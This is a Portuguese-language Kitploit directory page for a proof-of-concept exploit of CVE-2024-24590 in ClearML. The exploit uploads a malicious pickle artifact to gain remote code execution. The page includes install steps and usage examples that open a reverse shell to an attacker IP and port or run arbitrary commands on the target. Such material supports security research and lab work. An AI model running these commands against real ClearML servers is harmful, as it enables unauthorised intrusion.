Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-24590-ClearML-RCE-CMD-POC — CVE-2024-24590 ClearML RCE&CMD POC | Kitploit
Ferramentas/GitHubGitHub/diegogarciayala/cve-2024-24590-clearml-rce-cmd-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoComando e ControleSegurança da Cadeia de SuprimentosFerramenta de Acesso Remoto
GitHubdiegogarciayala/cve-2024-24590-clearml-rce-cmd-poc

CVE-2024-24590-ClearML-RCE-CMD-POC

CVE-2024-24590 ClearML RCE&CMD POC

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
913há 2 anosAinda não revisado
Compartilhar

Script de Exploração do ClearML

Este repositório contém um script de exploração em Python para a CVE-2024-24590. O script foi projetado para carregar um arquivo pickle malicioso para o ClearML, que executa um shell reverso ou um comando personalizado.

Funcionalidades

  • Carrega um artefato pickle malicioso para o ClearML.
  • Executa um shell reverso ou um comando personalizado na máquina alvo.
  • Suporta nomes personalizados de projetos e tarefas.
  • Permite definir uma tag na tarefa.

Uso

Pré-requisitos

  • Python 3.x
  • ClearML SDK
  • argparse (geralmente incluído no Python)

Instalação

  1. Clone o repositório:

    root@kitploit:~
    git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
    cd CVE-2024-24590-ClearML-RCE-CMD-POC
    
  2. Instale o ClearML SDK:

    root@kitploit:~
    pip install clearml
    clearml-init
    

Executando o Script

O script suporta dois modos de operação: default e cmd.

Modo Default

Neste modo, você deve fornecer o IP e a porta do atacante para estabelecer um shell reverso.

root@kitploit:~
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>

Modo CMD

Neste modo, você pode fornecer um comando personalizado a ser executado.

root@kitploit:~
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"

Exemplos

root@kitploit:~
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
root@kitploit:~
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"

whoami

  • HackTheBox: sl4sh1t0
  • Telegram: sl4sh1t0
  • X (Twitter): @diegogarciayala

Créditos

https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

Baixar ferramenta